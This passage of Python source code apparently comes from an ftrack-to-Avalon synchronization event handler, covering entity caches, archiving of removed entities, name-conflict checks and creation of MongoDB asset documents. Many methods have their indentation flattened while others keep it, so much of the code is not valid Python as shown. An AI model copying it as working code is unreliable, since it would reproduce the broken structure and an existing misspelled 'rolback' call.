        # - store synchronize entity types to be able to use
        #   only entityTypes in interest instead of filtering by ignored
        self.debug_sync_types = collections.defaultdict(list)

        # Set processing session to not use global
        self.set_process_session(session)
        super().__init__(session, plugins_presets)
def debug_logs(self):
"""This is debug method for printing small debugs messages. """
now_datetime = datetime.datetime.now()
delta = now_datetime - self.debug_print_time
if delta.total_seconds() < self.debug_print_time_expiration:
return
self.debug_print_time = now_datetime
known_types_items = []
for entityType, entity_type in self.debug_sync_types.items():
ent_types_msg = ", ".join(entity_type)
known_types_items.append(
"<{}> ({})".format(entityType, ent_types_msg)
)
known_entityTypes = ", ".join(known_types_items)
self.log.debug(
"DEBUG MESSAGE: Known types {}".format(known_entityTypes)
)
@property
def cur_project(self):
if self._cur_project is None:
found_id = None
for ent_info in self._cur_event["data"]["entities"]:
if found_id is not None:
break
parents = ent_info.get("parents") or []
for parent in parents:
if parent.get("entityType") == "show":
found_id = parent.get("entityId")
break
if found_id:
self._cur_project = self.process_session.query(
self.project_query.format(found_id)
).one()
return self._cur_project
@property
def avalon_cust_attrs(self):
if self._avalon_cust_attrs is None:
self._avalon_cust_attrs = avalon_sync.get_pype_attr(
self.process_session
)
return self._avalon_cust_attrs
@property
def avalon_entities(self):
if self._avalon_ents is None:
self.dbcon.install()
self.dbcon.Session["AVALON_PROJECT"] = (
self.cur_project["full_name"]
)
avalon_project = self.dbcon.find_one({"type": "project"})
avalon_entities = list(self.dbcon.find({"type": "asset"}))
self._avalon_ents = (avalon_project, avalon_entities)
return self._avalon_ents
@property
def avalon_ents_by_name(self):
if self._avalon_ents_by_name is None:
self._avalon_ents_by_name = {}
proj, ents = self.avalon_entities
for ent in ents:
self._avalon_ents_by_name[ent["name"]] = ent
return self._avalon_ents_by_name
@property
def avalon_ents_by_id(self):
if self._avalon_ents_by_id is None:
self._avalon_ents_by_id = {}
proj, ents = self.avalon_entities
if proj:
self._avalon_ents_by_id[proj["_id"]] = proj
for ent in ents:
self._avalon_ents_by_id[ent["_id"]] = ent
return self._avalon_ents_by_id
@property
def avalon_ents_by_parent_id(self):
if self._avalon_ents_by_parent_id is None:
self._avalon_ents_by_parent_id = collections.defaultdict(list)
proj, ents = self.avalon_entities
for ent in ents:
vis_par = ent["data"]["visualParent"]
if vis_par is None:
vis_par = proj["_id"]
self._avalon_ents_by_parent_id[vis_par].append(ent)
return self._avalon_ents_by_parent_id
@property
def avalon_ents_by_ftrack_id(self):
if self._avalon_ents_by_ftrack_id is None:
self._avalon_ents_by_ftrack_id = {}
proj, ents = self.avalon_entities
if proj:
ftrack_id = proj["data"]["ftrackId"]
self._avalon_ents_by_ftrack_id[ftrack_id] = proj
for ent in ents:
ftrack_id = ent["data"].get("ftrackId")
if ftrack_id is None:
continue
self._avalon_ents_by_ftrack_id[ftrack_id] = ent
return self._avalon_ents_by_ftrack_id
@property
def avalon_subsets_by_parents(self):
if self._avalon_subsets_by_parents is None:
self._avalon_subsets_by_parents = collections.defaultdict(list)
self.dbcon.install()
self.dbcon.Session["AVALON_PROJECT"] = (
self.cur_project["full_name"]
)
for subset in self.dbcon.find({"type": "subset"}):
self._avalon_subsets_by_parents[subset["parent"]].append(
subset
)
return self._avalon_subsets_by_parents
@property
def avalon_archived_by_id(self):
if self._avalon_archived_by_id is None:
self._avalon_archived_by_id = {}
self.dbcon.install()
self.dbcon.Session["AVALON_PROJECT"] = (
self.cur_project["full_name"]
)
for asset in self.dbcon.find({"type": "archived_asset"}):
self._avalon_archived_by_id[asset["_id"]] = asset
return self._avalon_archived_by_id
@property
def avalon_archived_by_name(self):
if self._avalon_archived_by_name is None:
self._avalon_archived_by_name = {}
for asset in self.avalon_archived_by_id.values():
self._avalon_archived_by_name[asset["name"]] = asset
return self._avalon_archived_by_name
@property
def changeability_by_mongo_id(self):
"""Return info about changeability of entity and it's parents."""
if self._changeability_by_mongo_id is None:
self._changeability_by_mongo_id = collections.defaultdict(
lambda: True
)
avalon_project, avalon_entities = self.avalon_entities
self._changeability_by_mongo_id[avalon_project["_id"]] = False
self._bubble_changeability(
list(self.avalon_subsets_by_parents.keys())
)
return self._changeability_by_mongo_id
    @property
    def avalon_custom_attributes(self):
        """Cached pype custom-attribute definitions from ftrack.

        NOTE(review): previous docstring was copy-pasted from
        `changeability_by_mongo_id`; also this duplicates `avalon_cust_attrs`
        but keeps its own cache attribute -- confirm both are needed.
        """
        if self._avalon_custom_attributes is None:
            self._avalon_custom_attributes = avalon_sync.get_pype_attr(
                self.process_session
            )
        return self._avalon_custom_attributes
    def remove_cached_by_key(self, key, values):
        """Evict entities from the in-memory caches by an attribute value.

        Removed entities are moved into the archived-by-id cache.

        Args:
            key (str): Attribute to match. Aliases "id" and "ftrack_id"
                are normalized to "_id" / "data.ftrackId"; any other dot
                separated document path is searched linearly.
            values: Single value or list/tuple of values to evict.
        """
        # Nothing is cached yet - nothing to evict
        if self._avalon_ents is None:
            return
        if not isinstance(values, (list, tuple)):
            values = [values]
        def get_found_data(entity):
            # Collect everything needed to evict entity from each cache
            if not entity:
                return None
            return {
                "ftrack_id": entity["data"]["ftrackId"],
                "parent_id": entity["data"]["visualParent"],
                "_id": entity["_id"],
                "name": entity["name"],
                "entity": entity
            }
        # Normalize key aliases to real document paths
        if key == "id":
            key = "_id"
        elif key == "ftrack_id":
            key = "data.ftrackId"
        found_data = {}
        project, entities = self._avalon_ents
        key_items = key.split(".")
        for value in values:
            ent = None
            # Prefer the specialized lookup caches when already built
            if key == "_id":
                if self._avalon_ents_by_id is not None:
                    ent = self._avalon_ents_by_id.get(value)
            elif key == "name":
                if self._avalon_ents_by_name is not None:
                    ent = self._avalon_ents_by_name.get(value)
            elif key == "data.ftrackId":
                if self._avalon_ents_by_ftrack_id is not None:
                    ent = self._avalon_ents_by_ftrack_id.get(value)
            if ent is None:
                # Fallback: linear search through all cached entities,
                # following the dot separated path into each document
                for _ent in entities:
                    _temp = _ent
                    for item in key_items:
                        _temp = _temp[item]
                    if _temp == value:
                        ent = _ent
                        break
            found_data[value] = get_found_data(ent)
        for value in values:
            data = found_data[value]
            if not data:
                # TODO logging
                self.log.warning(
                    "Didn't found entity by key/value \"{}\" / \"{}\"".format(
                        key, value
                    )
                )
                continue
            ftrack_id = data["ftrack_id"]
            parent_id = data["parent_id"]
            mongo_id = data["_id"]
            name = data["name"]
            entity = data["entity"]
            # Remove from the main cached (project, entities) tuple
            project, ents = self._avalon_ents
            ents.remove(entity)
            self._avalon_ents = project, ents
            # Remove from every lookup cache that was already built
            if self._avalon_ents_by_ftrack_id is not None:
                self._avalon_ents_by_ftrack_id.pop(ftrack_id, None)
            if self._avalon_ents_by_parent_id is not None:
                self._avalon_ents_by_parent_id[parent_id].remove(entity)
            if self._avalon_ents_by_id is not None:
                self._avalon_ents_by_id.pop(mongo_id, None)
            if self._avalon_ents_by_name is not None:
                self._avalon_ents_by_name.pop(name, None)
            # Evicted entities are considered archived from now on
            if self._avalon_archived_by_id is not None:
                self._avalon_archived_by_id[mongo_id] = entity
    def _bubble_changeability(self, unchangeable_ids):
        """Mark entities and all their parents as unchangeable.

        Walks up the 'visualParent' chain from each passed id and stores
        False in `_changeability_by_mongo_id` for every visited entity.

        Args:
            unchangeable_ids (list): Mongo ids of entities holding
                published subsets (these and their parents must not be
                renamed/removed).
        """
        unchangeable_queue = queue.Queue()
        for entity_id in unchangeable_ids:
            unchangeable_queue.put((entity_id, False))
        processed_parents_ids = []
        while not unchangeable_queue.empty():
            entity_id, child_is_archived = unchangeable_queue.get()
            # skip if already processed
            if entity_id in processed_parents_ids:
                continue
            entity = self.avalon_ents_by_id.get(entity_id)
            # if entity is not archived but unchageable child was then skip
            # - archived entities should not affect not archived?
            if entity and child_is_archived:
                continue
            # set changeability of current entity to False
            self._changeability_by_mongo_id[entity_id] = False
            processed_parents_ids.append(entity_id)
            # if not entity then is probably archived
            if not entity:
                entity = self.avalon_archived_by_id.get(entity_id)
                child_is_archived = True
            if not entity:
                # if entity is not found then it is subset without parent
                if entity_id in unchangeable_ids:
                    _subset_ids = [
                        str(sub["_id"]) for sub in
                        self.avalon_subsets_by_parents[entity_id]
                    ]
                    joined_subset_ids = "| ".join(_subset_ids)
                    self.log.warning((
                        "Parent <{}> for subsets <{}> does not exist"
                    ).format(str(entity_id), joined_subset_ids))
                else:
                    self.log.warning((
                        "In avalon are entities without valid parents that"
                        " lead to Project (should not cause errors)"
                        " - MongoId <{}>"
                    ).format(str(entity_id)))
                continue
            # skip if parent is project
            parent_id = entity["data"]["visualParent"]
            if parent_id is None:
                continue
            unchangeable_queue.put((parent_id, child_is_archived))
def reset_variables(self):
"""Reset variables so each event callback has clear env."""
self._cur_project = None
self._avalon_cust_attrs = None
self._avalon_ents = None
self._avalon_ents_by_id = None
self._avalon_ents_by_parent_id = None
self._avalon_ents_by_ftrack_id = None
self._avalon_ents_by_name = None
self._avalon_subsets_by_parents = None
self._changeability_by_mongo_id = None
self._avalon_archived_by_id = None
self._avalon_archived_by_name = None
self._avalon_custom_attributes = None
self._ent_types_by_name = None
self.ftrack_ents_by_id = {}
self.obj_id_ent_type_map = {}
self.ftrack_recreated_mapping = {}
self.ftrack_added = {}
self.ftrack_moved = {}
self.ftrack_renamed = {}
self.ftrack_updated = {}
self.ftrack_removed = {}
# set of ftrack ids with modified tasks
# handled separately by full wipeout and replace from FTrack
self.modified_tasks_ftrackids = set()
self.moved_in_avalon = []
self.renamed_in_avalon = []
self.hier_cust_attrs_changes = collections.defaultdict(list)
self.duplicated = []
self.regex_failed = []
self.regex_schemas = {}
self.updates = collections.defaultdict(dict)
self.report_items = {
"info": collections.defaultdict(list),
"warning": collections.defaultdict(list),
"error": collections.defaultdict(list)
}
def set_process_session(self, session):
try:
self.process_session.close()
except Exception:
pass
self.process_session = ftrack_api.Session(
server_url=session.server_url,
api_key=session.api_key,
api_user=session.api_user,
auto_connect_event_hub=True
)
atexit.register(lambda: self.process_session.close())
def filter_updated(self, updates):
filtered_updates = {}
for ftrack_id, ent_info in updates.items():
changed_keys = [k for k in (ent_info.get("keys") or [])]
changes = {
k: v for k, v in (ent_info.get("changes") or {}).items()
}
entity_type = ent_info["entity_type"]
if entity_type == "Task":
if "name" in changed_keys:
ent_info["keys"] = ["name"]
ent_info["changes"] = {"name": changes.pop("name")}
filtered_updates[ftrack_id] = ent_info
continue
for _key in self.ignore_keys:
if _key in changed_keys:
changed_keys.remove(_key)
changes.pop(_key, None)
if not changed_keys:
continue
# Remove custom attributes starting with `avalon_` from changes
# - these custom attributes are not synchronized
avalon_keys = []
for key in changes:
if key.startswith("avalon_"):
avalon_keys.append(key)
for _key in avalon_keys:
changed_keys.remove(_key)
changes.pop(_key, None)
if not changed_keys:
continue
ent_info["keys"] = changed_keys
ent_info["changes"] = changes
filtered_updates[ftrack_id] = ent_info
return filtered_updates
def get_ent_path(self, ftrack_id):
"""
Looks for entity in FTrack with 'ftrack_id'. If found returns
concatenated paths from its 'link' elemenent's names. Describes
location of entity in tree.
Args:
ftrack_id (string): entityId of FTrack entity
Returns:
(string) - example : "/test_project/assets/my_asset"
"""
entity = self.ftrack_ents_by_id.get(ftrack_id)
if not entity:
entity = self.process_session.query(
self.entities_query_by_id.format(
self.cur_project["id"], ftrack_id
)
).first()
if entity:
self.ftrack_ents_by_id[ftrack_id] = entity
else:
return "unknown hierarchy"
return "/".join([ent["name"] for ent in entity["link"]])
    def launch(self, session, event):
        """Main entry point for synchronization.

        Goes through the event (which may contain multiple changes) and
        decides whether it is interesting (interest_entTypes). Changes
        are separated into add|remove|move|update buckets; all task
        changes are handled together by a refresh from Ftrack. The
        buckets are then processed in a fixed order (removed, renamed,
        added, moved, updated, hierarchy cleanup, task updates).

        Args:
            session (object): session to Ftrack
            event (dictionary): event content

        Returns:
            (boolean or None): True when processing finished (even on
                handled errors) so the event is not re-delivered.
        """
        # Try to commit and if any error happen then recreate session
        try:
            self.process_session.commit()
        except Exception:
            self.set_process_session(session)
        # Reset object values for each launch
        self.reset_variables()
        self._cur_event = event
        entities_by_action = {
            "remove": {},
            "update": {},
            "move": {},
            "add": {}
        }
        entities_info = event["data"]["entities"]
        found_actions = set()
        for ent_info in entities_info:
            entityType = ent_info["entityType"]
            if entityType not in self.interest_entTypes:
                continue
            entity_type = ent_info.get("entity_type")
            if not entity_type or entity_type in self.ignore_ent_types:
                continue
            # Track which object types were seen per entityType (debug)
            if entity_type not in self.debug_sync_types[entityType]:
                self.debug_sync_types[entityType].append(entity_type)
            action = ent_info["action"]
            ftrack_id = ent_info["entityId"]
            # Defensive: `entityId` should be a string; take first item
            # when a list arrives and log it as a bug report
            if isinstance(ftrack_id, list):
                self.log.warning((
                    "BUG REPORT: Entity info has `entityId` as `list` \"{}\""
                ).format(ent_info))
                if len(ftrack_id) == 0:
                    continue
                ftrack_id = ftrack_id[0]
            # task modified, collect parent id of task, handle separately
            if entity_type.lower() == "task":
                changes = ent_info.get("changes") or {}
                if action == "move":
                    parent_changes = changes["parent_id"]
                    self.modified_tasks_ftrackids.add(parent_changes["new"])
                    self.modified_tasks_ftrackids.add(parent_changes["old"])
                elif "typeid" in changes or "name" in changes:
                    self.modified_tasks_ftrackids.add(ent_info["parentId"])
                continue
            if action == "move":
                ent_keys = ent_info["keys"]
                # Separate update info from move action
                if len(ent_keys) > 1:
                    _ent_info = ent_info.copy()
                    for ent_key in ent_keys:
                        if ent_key == "parent_id":
                            _ent_info["changes"].pop(ent_key, None)
                            _ent_info["keys"].remove(ent_key)
                        else:
                            ent_info["changes"].pop(ent_key, None)
                            ent_info["keys"].remove(ent_key)
                    entities_by_action["update"][ftrack_id] = _ent_info
            # regular change process handles all other than Tasks
            found_actions.add(action)
            entities_by_action[action][ftrack_id] = ent_info
        found_actions = list(found_actions)
        if not found_actions and not self.modified_tasks_ftrackids:
            return True
        # Check if auto sync was turned on/off
        updated = entities_by_action["update"]
        for ftrack_id, ent_info in updated.items():
            # filter project
            if ent_info["entityType"] != "show":
                continue
            changes = ent_info["changes"]
            if CUST_ATTR_AUTO_SYNC not in changes:
                continue
            auto_sync = changes[CUST_ATTR_AUTO_SYNC]["new"]
            if auto_sync == "1":
                # Trigger sync to avalon action if auto sync was turned on
                ft_project = self.cur_project
                self.log.debug((
                    "Auto sync was turned on for project <{}>."
                    " Triggering syncToAvalon action."
                ).format(ft_project["full_name"]))
                selection = [{
                    "entityId": ft_project["id"],
                    "entityType": "show"
                }]
                self.trigger_action(
                    action_name="sync.to.avalon.server",
                    event=event,
                    selection=selection
                )
            # Exit for both cases
            return True
        # Filter updated data by changed keys
        updated = self.filter_updated(updated)
        # skip most of events where nothing has changed for avalon
        if (
            len(found_actions) == 1
            and found_actions[0] == "update"
            and not updated
            and not self.modified_tasks_ftrackids
        ):
            return True
        ft_project = self.cur_project
        # Check if auto-sync custom attribute exists
        if CUST_ATTR_AUTO_SYNC not in ft_project["custom_attributes"]:
            # TODO should we sent message to someone?
            self.log.error((
                "Custom attribute \"{}\" is not created or user \"{}\" used"
                " for Event server don't have permissions to access it!"
            ).format(CUST_ATTR_AUTO_SYNC, self.session.api_user))
            return True
        # Skip if auto-sync is not set
        auto_sync = ft_project["custom_attributes"][CUST_ATTR_AUTO_SYNC]
        if auto_sync is not True:
            return True
        debug_msg = "Updated: {}".format(len(updated))
        debug_action_map = {
            "add": "Created",
            "remove": "Removed",
            "move": "Moved"
        }
        for action, infos in entities_by_action.items():
            if action == "update":
                continue
            _action = debug_action_map[action]
            debug_msg += "| {}: {}".format(_action, len(infos))
        self.log.debug("Project changes <{}>: {}".format(
            ft_project["full_name"], debug_msg
        ))
        # Get ftrack entities - find all ftrack ids first
        ftrack_ids = set(updated.keys())
        for action, _ftrack_ids in entities_by_action.items():
            # skip updated (already prepared) and removed (not exist in ftrack)
            if action not in ("remove", "update"):
                ftrack_ids |= set(_ftrack_ids)
        # collect entity records data which might not be in event
        if ftrack_ids:
            joined_ids = ", ".join(["\"{}\"".format(id) for id in ftrack_ids])
            ftrack_entities = self.process_session.query(
                self.entities_query_by_id.format(ft_project["id"], joined_ids)
            ).all()
            for entity in ftrack_entities:
                self.ftrack_ents_by_id[entity["id"]] = entity
        # Filter updates where name is changing
        for ftrack_id, ent_info in updated.items():
            ent_keys = ent_info["keys"]
            # Seprate update info from rename
            if "name" not in ent_keys:
                continue
            _ent_info = copy.deepcopy(ent_info)
            for ent_key in ent_keys:
                if ent_key == "name":
                    ent_info["changes"].pop(ent_key, None)
                    ent_info["keys"].remove(ent_key)
                else:
                    _ent_info["changes"].pop(ent_key, None)
                    _ent_info["keys"].remove(ent_key)
            self.ftrack_renamed[ftrack_id] = _ent_info
        self.ftrack_removed = entities_by_action["remove"]
        self.ftrack_moved = entities_by_action["move"]
        self.ftrack_added = entities_by_action["add"]
        self.ftrack_updated = updated
        self.debug_logs()
        self.log.debug("Synchronization begins")
        try:
            time_1 = time.time()
            # 1.) Process removed - may affect all other actions
            self.process_removed()
            time_2 = time.time()
            # 2.) Process renamed - may affect added
            self.process_renamed()
            time_3 = time.time()
            # 3.) Process added - moved entity may be moved to new entity
            self.process_added()
            time_4 = time.time()
            # 4.) Process moved
            self.process_moved()
            time_5 = time.time()
            # 5.) Process updated
            self.process_updated()
            time_6 = time.time()
            # 6.) Process changes in hierarchy or hier custom attribues
            self.process_hier_cleanup()
            time_7 = time.time()
            self.process_task_updates()
            if self.updates:
                self.update_entities()
            time_8 = time.time()
            time_removed = time_2 - time_1
            time_renamed = time_3 - time_2
            time_added = time_4 - time_3
            time_moved = time_5 - time_4
            time_updated = time_6 - time_5
            time_cleanup = time_7 - time_6
            time_task_updates = time_8 - time_7
            time_total = time_8 - time_1
            self.log.debug((
                "Process time: {:.2f} <{:.2f}, {:.2f}, {:.2f}, "
                "{:.2f}, {:.2f}, {:.2f}, {:.2f}>"
            ).format(
                time_total, time_removed, time_renamed, time_added,
                time_moved, time_updated, time_cleanup, time_task_updates
            ))
        except Exception:
            msg = "An error has happened during synchronization"
            self.report_items["error"][msg].append((
                str(traceback.format_exc()).replace("\n", "<br>")
            ).replace(" ", " "))
        self.report()
        return True
def process_removed(self):
"""
Handles removed entities (not removed tasks - handle separately).
"""
if not self.ftrack_removed:
return
ent_infos = self.ftrack_removed
self.log.debug(
"Processing removed entities: {}".format(str(ent_infos))
)
removable_ids = []
recreate_ents = []
removed_names = []
for ftrack_id, removed in ent_infos.items():
entity_type = removed["entity_type"]
if entity_type.lower() == "task":
continue
removed_name = removed["changes"]["name"]["old"]
avalon_ent = self.avalon_ents_by_ftrack_id.get(ftrack_id)
if not avalon_ent:
continue
mongo_id = avalon_ent["_id"]
if self.changeability_by_mongo_id[mongo_id]:
removable_ids.append(mongo_id)
removed_names.append(removed_name)
else:
recreate_ents.append(avalon_ent)
if removable_ids:
# TODO logging
self.log.debug("Assets marked as archived <{}>".format(
", ".join(removed_names)
))
self.dbcon.update_many(
{"_id": {"$in": removable_ids}, "type": "asset"},
{"$set": {"type": "archived_asset"}}
)
self.remove_cached_by_key("id", removable_ids)
if recreate_ents:
# sort removed entities by parents len
# - length of parents determine hierarchy level
recreate_ents = sorted(
recreate_ents,
key=(lambda item: len(
(item.get("data", {}).get("parents") or [])
))
)
# TODO logging
# TODO report
recreate_msg = (
"Deleted entity was recreated||Entity was recreated because"
" it or its children contain published data"
)
proj, ents = self.avalon_entities
for avalon_entity in recreate_ents:
old_ftrack_id = avalon_entity["data"]["ftrackId"]
vis_par = avalon_entity["data"]["visualParent"]
if vis_par is None:
vis_par = proj["_id"]
parent_ent = self.avalon_ents_by_id[vis_par]
parent_ftrack_id = parent_ent["data"]["ftrackId"]
parent_ftrack_ent = self.ftrack_ents_by_id.get(
parent_ftrack_id
)
if not parent_ftrack_ent:
if parent_ent["type"].lower() == "project":
parent_ftrack_ent = self.cur_project
else:
parent_ftrack_ent = self.process_session.query(
self.entities_query_by_id.format(
self.cur_project["id"], parent_ftrack_id
)
).one()
entity_type = avalon_entity["data"]["entityType"]
new_entity = self.process_session.create(entity_type, {
"name": avalon_entity["name"],
"parent": parent_ftrack_ent
})
try:
self.process_session.commit()
except Exception:
# TODO logging
# TODO report
self.process_session.rolback()
ent_path_items = [self.cur_project["full_name"]]
ent_path_items.extend([
par for par in avalon_entity["data"]["parents"]
])
ent_path_items.append(avalon_entity["name"])
ent_path = "/".join(ent_path_items)
error_msg = "Couldn't recreate entity in Ftrack"
report_msg = (
"{}||Trying to recreate because it or its children"
" contain published data"
).format(error_msg)
self.report_items["warning"][report_msg].append(ent_path)
self.log.warning(
"{}. Process session commit failed! <{}>".format(
error_msg, ent_path
),
exc_info=True
)
continue
new_entity_id = new_entity["id"]
avalon_entity["data"]["ftrackId"] = new_entity_id
for key, val in avalon_entity["data"].items():
if not val:
continue
if key not in new_entity["custom_attributes"]:
continue
new_entity["custom_attributes"][key] = val
new_entity["custom_attributes"][CUST_ATTR_ID_KEY] = (
str(avalon_entity["_id"])
)
ent_path = self.get_ent_path(new_entity_id)
try:
self.process_session.commit()
except Exception:
# TODO logging
# TODO report
self.process_session.rolback()
error_msg = (
"Couldn't update custom attributes after recreation"
" of entity in Ftrack"
)
report_msg = (
"{}||Entity was recreated because it or its children"
" contain published data"
).format(error_msg)
self.report_items["warning"][report_msg].append(ent_path)
self.log.warning(
"{}. Process session commit failed! <{}>".format(
error_msg, ent_path
),
exc_info=True
)
continue
self.report_items["info"][recreate_msg].append(ent_path)
self.ftrack_recreated_mapping[old_ftrack_id] = new_entity_id
self.process_session.commit()
found_idx = None
proj_doc, asset_docs = self._avalon_ents
for idx, asset_doc in enumerate(asset_docs):
if asset_doc["_id"] == avalon_entity["_id"]:
found_idx = idx
break
if found_idx is None:
continue
# Prepare updates dict for mongo update
if "data" not in self.updates[avalon_entity["_id"]]:
self.updates[avalon_entity["_id"]]["data"] = {}
self.updates[avalon_entity["_id"]]["data"]["ftrackId"] = (
new_entity_id
)
# Update cached entities
asset_docs[found_idx] = avalon_entity
self._avalon_ents = proj_doc, asset_docs
if self._avalon_ents_by_id is not None:
mongo_id = avalon_entity["_id"]
self._avalon_ents_by_id[mongo_id] = avalon_entity
if self._avalon_ents_by_parent_id is not None:
vis_par = avalon_entity["data"]["visualParent"]
children = self._avalon_ents_by_parent_id[vis_par]
found_idx = None
for idx, _entity in enumerate(children):
if _entity["_id"] == avalon_entity["_id"]:
found_idx = idx
break
children[found_idx] = avalon_entity
self._avalon_ents_by_parent_id[vis_par] = children
if self._avalon_ents_by_ftrack_id is not None:
self._avalon_ents_by_ftrack_id.pop(old_ftrack_id)
self._avalon_ents_by_ftrack_id[new_entity_id] = (
avalon_entity
)
if self._avalon_ents_by_name is not None:
name = avalon_entity["name"]
self._avalon_ents_by_name[name] = avalon_entity
# Check if entities with same name can be synchronized
if not removed_names:
return
self.check_names_synchronizable(removed_names)
    def check_names_synchronizable(self, names):
        """Check if entities with specific names are importable.

        This check should happen after removing or renaming an entity:
        once a name is freed, another ftrack entity with that name may
        become synchronizable. Found entities are created in avalon
        together with their (non-task) children.

        Args:
            names (list): Entity names that were just freed.
        """
        joined_passed_names = ", ".join(
            ["\"{}\"".format(name) for name in names]
        )
        same_name_entities = self.process_session.query(
            self.entities_name_query_by_name.format(
                self.cur_project["id"], joined_passed_names
            )
        ).all()
        if not same_name_entities:
            return
        entities_by_name = collections.defaultdict(list)
        for entity in same_name_entities:
            entities_by_name[entity["name"]].append(entity)
        synchronizable_ents = []
        self.log.debug((
            "Deleting of entities should allow to synchronize another entities"
            " with same name."
        ))
        for name, ents in entities_by_name.items():
            # Name must now be unique in ftrack to be synchronizable
            if len(ents) != 1:
                self.log.debug((
                    "Name \"{}\" still have more than one entity <{}>"
                ).format(
                    name, "| ".join(
                        [self.get_ent_path(ent["id"]) for ent in ents]
                    )
                ))
                continue
            entity = ents[0]
            ent_path = self.get_ent_path(entity["id"])
            # TODO logging
            self.log.debug(
                "Checking if can synchronize entity <{}>".format(ent_path)
            )
            # skip if already synchronized
            ftrack_id = entity["id"]
            if ftrack_id in self.avalon_ents_by_ftrack_id:
                # TODO logging
                self.log.debug(
                    "- Entity is already synchronized (skipping) <{}>".format(
                        ent_path
                    )
                )
                continue
            parent_id = entity["parent_id"]
            if parent_id not in self.avalon_ents_by_ftrack_id:
                # TODO logging
                self.log.debug((
                    "- Entity's parent entity doesn't seems to"
                    " be synchronized (skipping) <{}>"
                ).format(ent_path))
                continue
            synchronizable_ents.append(entity)
        if not synchronizable_ents:
            return
        # Sort by hierarchy depth so parents are created before children
        synchronizable_ents = sorted(
            synchronizable_ents,
            key=(lambda entity: len(entity["link"]))
        )
        children_queue = queue.Queue()
        for entity in synchronizable_ents:
            parent_avalon_ent = self.avalon_ents_by_ftrack_id[
                entity["parent_id"]
            ]
            self.create_entity_in_avalon(entity, parent_avalon_ent)
            for child in entity["children"]:
                if child.entity_type.lower() == "task":
                    continue
                children_queue.put(child)
        # Breadth-first creation of all descendants
        while not children_queue.empty():
            entity = children_queue.get()
            ftrack_id = entity["id"]
            name = entity["name"]
            ent_by_ftrack_id = self.avalon_ents_by_ftrack_id.get(ftrack_id)
            if ent_by_ftrack_id:
                raise Exception((
                    "This is bug, parent was just synchronized to avalon"
                    " but entity is already in database {}"
                ).format(dict(entity)))
            # Entity has duplicated name with another entity
            # - may be renamed: in that case renaming method will handle that
            duplicate_ent = self.avalon_ents_by_name.get(name)
            if duplicate_ent:
                continue
            passed_regex = avalon_sync.check_regex(
                name, "asset", schema_patterns=self.regex_schemas
            )
            if not passed_regex:
                continue
            parent_id = entity["parent_id"]
            parent_avalon_ent = self.avalon_ents_by_ftrack_id[parent_id]
            self.create_entity_in_avalon(entity, parent_avalon_ent)
            for child in entity["children"]:
                if child.entity_type.lower() == "task":
                    continue
                children_queue.put(child)
def create_entity_in_avalon(self, ftrack_ent, parent_avalon):
proj, ents = self.avalon_entities
# Parents, Hierarchy
ent_path_items = [ent["name"] for ent in ftrack_ent["link"]]
parents = ent_path_items[1:len(ent_path_items)-1:]
hierarchy = ""
if len(parents) > 0:
hierarchy = os.path.sep.join(parents)
# TODO logging
self.log.debug(
"Trying to synchronize entity <{}>".format(
"/".join(ent_path_items)
)
)
# Add entity to modified so tasks are added at the end
self.modified_tasks_ftrackids.add(ftrack_ent["id"])
# Visual Parent
vis_par = None
if parent_avalon["type"].lower() != "project":
vis_par = parent_avalon["_id"]
mongo_id = ObjectId()
name = ftrack_ent["name"]
final_entity = {
"_id": mongo_id,
"name": name,
"type": "asset",
"schema": EntitySchemas["asset"],
"parent": proj["_id"],
"data": {
"ftrackId": ftrack_ent["id"],
"entityType": ftrack_ent.entity_type,
"parents": parents,
"hierarchy": hierarchy,
"tasks": {},
"visualParent": vis_par
}
}
cust_attrs = self.get_cust_attr_values(ftrack_ent)
for key, val in cust_attrs.items():
if key.startswith("avalon_"):
continue
final_entity["data"][key] = val
_mongo_id_str = cust_attrs.get(CUST_ATTR_ID_KEY)
if _mongo_id_str:
try:
_mongo_id = ObjectId(_mongo_id_str)
if _mongo_id not in self.avalon_ents_by_id:
mongo_id = _mongo_id
final_entity["_id"] = mongo_id
except Exception:
pass
ent_path_items = [self.cur_project["full_name"]]
ent_path_items.extend([par for par in parents])
ent_path_items.append(name)
ent_path = "/".join(ent_path_items)
try:
schema.validate(final_entity)
except Exception:
# TODO logging
# TODO report
error_msg = (
"Schema validation failed for new entity (This is a bug)"
)
error_traceback = (
str(traceback.format_exc()).replace("\n", "<br>")
).replace(" ", " ")
item_msg = ent_path + "<br>" + error_traceback
self.report_items["error"][error_msg].append(item_msg)
self.log.error(
"{}: \"{}\"".format(error_msg, str(final_entity)),
exc_info=True
)
return None
replaced = False
archived = self.avalon_archived_by_name.get(name)
if archived:
archived_id = archived["_id"]
if (
archived["data"]["parents"] == parents or
self.changeability_by_mongo_id[archived_id]
):
# TODO logging
self.log.debug(
"Entity was unarchived instead of creation <{}>".format(
ent_path
)
)
mongo_id = archived_id
final_entity["_id"] = mongo_id
self.dbcon.replace_one({"_id": mongo_id}, final_entity)
replaced = True
if not replaced:
self.dbcon.insert_one(final_entity)
# TODO logging
self.log.debug("Entity was synchronized <{}>".format(ent_path))
mongo_id_str = str(mongo_id)
if mongo_id_str != ftrack_ent["custom_attributes"][CUST_ATTR_ID_KEY]:
ftrack_ent["custom_attributes"][CUST_ATTR_ID_KEY] = mongo_id_str
try:
self.process_session.commit()
except Exception:
self.process_session.rolback()
# TODO logging
# TODO report
error_msg = (
"Failed to store MongoID to entity's custom attribute"
)
report_msg = (
"{}||SyncToAvalon action may solve this issue"
).format(error_msg)
self.report_items["warning"][report_msg].append(ent_path)
self.log.error(
"{}: \"{}\"".format(error_msg, ent_path),
exc_info=True
)
# modify cached data
# Skip if self._avalon_ents is not set(maybe never happen)
if self._avalon_ents is None:
return final_entity
if self._avalon_ents is not None:
proj, ents = self._avalon_ents
ents.append(final_entity)
self._avalon_ents = (proj, ents)
if self._avalon_ents_by_id is not None:
self._avalon_ents_by_id[mongo_id] = final_entity
if self._avalon_ents_by_parent_id is not None:
self._avalon_ents_by_parent_id[vis_par].append(final_entity)
if self._avalon_ents_by_ftrack_id is not None:
self._avalon_ents_by_ftrack_id[ftrack_ent["id"]] = final_entity
if self._avalon_ents_by_name is not None:
self._avalon_ents_by_name[ftrack_ent["name"]] = final_entity
return final_entity
    def get_cust_attr_values(self, entity, keys=None):
        """Collect custom attribute values set on a ftrack entity.

        Args:
            entity: Ftrack entity with 'custom_attributes'.
            keys (list, optional): Limit collection to these keys; when
                None all available attributes are collected.

        Returns:
            dict: Attribute key -> value. Hierarchical attributes are
                resolved through parent entities with definition
                defaults; the avalon mongo id key is skipped there.
        """
        output = {}
        custom_attrs, hier_attrs = self.avalon_custom_attributes
